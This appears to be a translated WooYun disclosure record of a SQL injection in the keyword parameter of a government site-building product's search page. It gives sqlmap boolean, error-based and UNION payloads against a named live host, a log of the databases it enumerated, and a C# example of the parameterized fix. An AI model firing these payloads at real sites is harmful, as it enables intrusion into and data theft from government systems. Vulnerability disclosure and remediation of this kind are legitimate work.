
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0103548

Title: SQL injection in a widely used government website-building system

Related vendor: 山东农友软件 (Shandong Nongyou Software)

Author: 路人甲

Submitted: 2015-03-25 18:23

Fixed: 2015-06-25 16:38

Published: 2015-06-25 16:38

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-03-25: Details sent to the vendor; awaiting vendor handling
2015-03-27: Vendor confirmed; details disclosed to the vendor only
2015-03-30: Details opened to third-party security partners
2015-05-21: Details opened to core white hats and domain experts
2015-05-31: Details opened to regular white hats
2015-06-10: Details opened to intern white hats
2015-06-25: Details disclosed to the public

Brief description:

RT (as in the title)

Detailed description:

Official website of 山东农友软件: http://www.nongyou.com.cn/
Examples (the affected instances all expose the same page, /gov/SearchInfoSum.aspx?keyword=):

Proof of vulnerability:

The keyword parameter is injectable.
Tested against: http://huodong.whinfo.net.cn/gov/SearchInfoSum.aspx?keyword=

Place: GET
Parameter: keyword
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keyword=%' AND 3437=3437 AND '%'='
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: keyword=%' AND 2049=CONVERT(INT,(CHAR(58) CHAR(113) CHAR(104) CHAR(
110) CHAR(58) (SELECT (CASE WHEN (2049=2049) THEN CHAR(49) ELSE CHAR(48) END)) C
HAR(58) CHAR(106) CHAR(97) CHAR(122) CHAR(58))) AND '%'='
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: keyword=%' UNION ALL SELECT CHAR(58) CHAR(113) CHAR(104) CHAR(110)
CHAR(58) CHAR(85) CHAR(110) CHAR(70) CHAR(81) CHAR(118) CHAR(84) CHAR(113) CHAR(
84) CHAR(120) CHAR(69) CHAR(58) CHAR(106) CHAR(97) CHAR(122) CHAR(58),NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[21:40:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[21:40:08] [INFO] fetching database names
[21:40:09] [INFO] the SQL query used returns 19 entries
[21:40:14] [INFO] retrieved: "3g_shop"
[21:40:15] [INFO] retrieved: "allMessage"
[21:40:20] [INFO] retrieved: "club_model"
[21:40:22] [INFO] retrieved: "eweb_gov"
[21:40:32] [INFO] retrieved: "eweb_serve"
[21:40:33] [INFO] retrieved: "eweb_sun"
[21:40:41] [INFO] retrieved: "kehuSns"
[21:40:45] [INFO] retrieved: "master"
[21:40:46] [INFO] retrieved: "model"
[21:40:52] [INFO] retrieved: "msdb"
[21:40:53] [INFO] retrieved: "NetSNS"
[21:40:57] [INFO] retrieved: "tempdb"
[21:41:05] [INFO] retrieved: "web800"
[21:41:06] [INFO] retrieved: "wh2_caijing"
[21:41:08] [INFO] retrieved: "wh2_favlife"
[21:41:09] [INFO] retrieved: "wh2_housenew"
[21:41:13] [INFO] retrieved: "wh2_search"
[21:41:14] [INFO] retrieved: "wh2_tbSMS"
[21:41:15] [INFO] retrieved: "whinfo_chat"
available databases [19]:
[*] 3g_shop
[*] allMessage
[*] club_model
[*] eweb_gov
[*] eweb_serve
[*] eweb_sun
[*] kehuSns
[*] master
[*] model
[*] msdb
[*] NetSNS
[*] tempdb
[*] web800
[*] wh2_caijing
[*] wh2_favlife
[*] wh2_housenew
[*] wh2_search
[*] wh2_tbSMS
[*] whinfo_chat
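The boolean-based payload above (`%' AND 3437=3437 AND '%'='`) tells a reviewer that the keyword is spliced straight into a LIKE '%...%' pattern. The C# below is an added illustration, not the vendor's code: a hypothetical search handler showing that concatenation beside a parameterized version for the same SQL Server back end; the table and column names (Info, Title, PubDate) and the connection string are assumptions.

```csharp
// Added example, not the vendor's code. Hypothetical handler reconstructing the
// query shape implied by the payloads above: a LIKE '%keyword%' filter.
// Table/column names are assumed.
using System;
using System.Data;
using System.Data.SqlClient;

public static class SearchInfoSum
{
    // VULNERABLE (as the payloads imply): the keyword is spliced into the SQL
    // text, so a value like "%' AND 1=1 AND '%'=" closes the LIKE pattern and
    // appends attacker-controlled logic. Shown only for contrast.
    public static string BuildUnsafeSql(string keyword)
    {
        return "SELECT Title, PubDate FROM Info WHERE Title LIKE '%" + keyword + "%'";
    }

    // LIKE treats [, % and _ as wildcards in SQL Server; escape them so the
    // user's input matches literally. Escape '[' first so the brackets added
    // for the other two are not re-escaped.
    public static string EscapeLike(string s)
    {
        return s.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
    }

    // HARDENED: the keyword travels as a typed parameter and the '%' wildcards
    // are concatenated in SQL around @kw, so the statement text never changes
    // with user input. This syntax also works on SQL Server 2000.
    public static DataTable Search(string connectionString, string keyword)
    {
        const string sql =
            "SELECT Title, PubDate FROM Info WHERE Title LIKE '%' + @kw + '%'";
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            // Fixed length and type: a value longer than 200 chars is truncated
            // rather than altering the query.
            cmd.Parameters.Add("@kw", SqlDbType.NVarChar, 200).Value =
                EscapeLike(keyword ?? string.Empty);
            var table = new DataTable();
            conn.Open();
            using (var reader = cmd.ExecuteReader())
                table.Load(reader);
            return table;
        }
    }
}
```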


Fix recommendation:

RT (as in the title)

Copyright notice: when reposting, please credit the source, 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 11

Confirmed: 2015-03-27 16:37

Vendor reply:

CNVD has already notified the website's operating unit (the software manufacturer) through the site's publicly listed contact details (or a previously established handling channel).

Latest status:

None yet